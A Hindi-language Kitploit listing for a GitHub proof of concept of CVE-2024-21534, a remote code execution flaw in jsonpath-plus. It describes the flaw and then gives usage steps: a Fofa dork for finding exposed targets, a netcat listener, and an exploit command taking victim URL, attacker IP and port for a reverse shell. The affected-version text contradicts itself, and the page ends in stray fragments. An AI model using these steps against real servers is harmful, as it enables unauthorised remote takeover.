Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
cve-2024-21534 — POC - CVE-2024-21534 Jsonpath-plus अनुचित इनपुट सैनिटाइज़ेशन के कारण रिमोट कोड निष्पादन (RCE) के लिए संवेदनशील है | Kitploit
उपकरण/GitHubGitHub/verylazytech/cve-2024-21534
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणलर्निंग और शिक्षारिमोट एक्सेस टूल
GitHubverylazytech/cve-2024-21534

cve-2024-21534

POC - CVE-2024-21534 Jsonpath-plus अनुचित इनपुट सैनिटाइज़ेशन के कारण रिमोट कोड निष्पादन (RCE) के लिए संवेदनशील है

रिपॉजिटरी देखें
51401 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
वेबसाइट
साझा करें

POC - CVE-2024-21534 Jsonpath-plus अनुचित इनपुट सैनिटाइज़ेशन के कारण रिमोट कोड निष्पादन (RCE) के लिए संवेदनशील

My Shop Medium Github Buy Me A Coffee

अवलोकन

CVE-2024-21534 jsonpath-plus पैकेज के संस्करण 10.0.0 से पहले के संस्करणों में पाई जाने वाली एक गंभीर भेद्यता है। यह भेद्यता अनुचित इनपुट सैनिटाइज़ेशन के कारण उत्पन्न होती है, जो प्रभावित सिस्टम पर रिमोट कोड निष्पादन (RCE) का कारण बन सकती है। यह भेद्यता विशेष रूप से खतरनाक है क्योंकि इसे बिना प्रमाणीकरण के शोषित किया जा सकता है, जिससे हमलावर विशेष रूप से तैयार इनपुट भेजकर सर्वर पर मनमाना कोड निष्पादित कर सकते हैं। यह समस्या Node.js vm मॉड्यूल के असुरक्षित डिफ़ॉल्ट उपयोग से उत्पन्न होती है, जिसका यदि शोषण किया जाता है, तो पूरे सिस्टम से समझौता हो सकता है।

प्रभावित संस्करण

jsonpath-plus के संस्करण 10.2.0 से पहले के

प्रभावित घटक

यह भेद्यता jsonpath-plus पैकेज में स्थित है, जो अनुप्रयोगों में JSON डेटा संरचनाओं को क्वेरी करने के लिए व्यापक रूप से उपयोग किया जाता है। यह दोष अनुचित इनपुट सैनिटाइज़ेशन के कारण है, जो दुर्भावनापूर्ण कोड निष्पादन की अनुमति देता है।

इसके बारे में पढ़ें — CVE-2024-21534

अस्वीकरण: यह प्रूफ ऑफ कॉन्सेप्ट (POC) केवल शैक्षिक और नैतिक परीक्षण उद्देश्यों के लिए बनाया गया है। पूर्व सहमति के बिना लक्ष्यों पर हमला करने के लिए इस उपकरण का उपयोग अवैध है। लागू स्थानीय, राज्य और संघीय कानूनों का पालन करना अंतिम उपयोगकर्ता की जिम्मेदारी है। डेवलपर्स कोई दायित्व नहीं मानते हैं और इस प्रोग्राम के कारण होने वाले किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं हैं।

आरंभ करना

लक्ष्य खोजना

संभावित लक्ष्य खोजने के लिए, Fofa (Shodan.io के समान) का उपयोग करें:

  • Fofa Dork: Jsonpath-plus

Fofa

रिपॉजिटरी क्लोन करना

सबसे पहले, रिपॉजिटरी क्लोन करें:

root@kitploit:~
git clone https://github.com/verylazytech/CVE-2024-21534

अब nc का उपयोग करके एक लिसनर खोलें:

root@kitploit:~
nc -lnvp 443

एक्सप्लॉइट चलाएँ:

Linux / MacOs के लिए:

सुनिश्चित करें कि URL किसी ऐसे एंडपॉइंट की ओर इंगित करता है जो संवेदनशील jsonpath-plus पैकेज के माध्यम से उपयोगकर्ता इनपुट को संसाधित करता है, क्योंकि यह RCE भेद्यता के शोषण की अनुमति देगा।

root@kitploit:~
bash ./cve-2024-21534.sh <VICTIM_URL> <ATTACKER_IP> <ATTACKER_PORT>

secoand

कुछ निर्देशिकाओं की सूची बनाना:

last

टूल डाउनलोड करें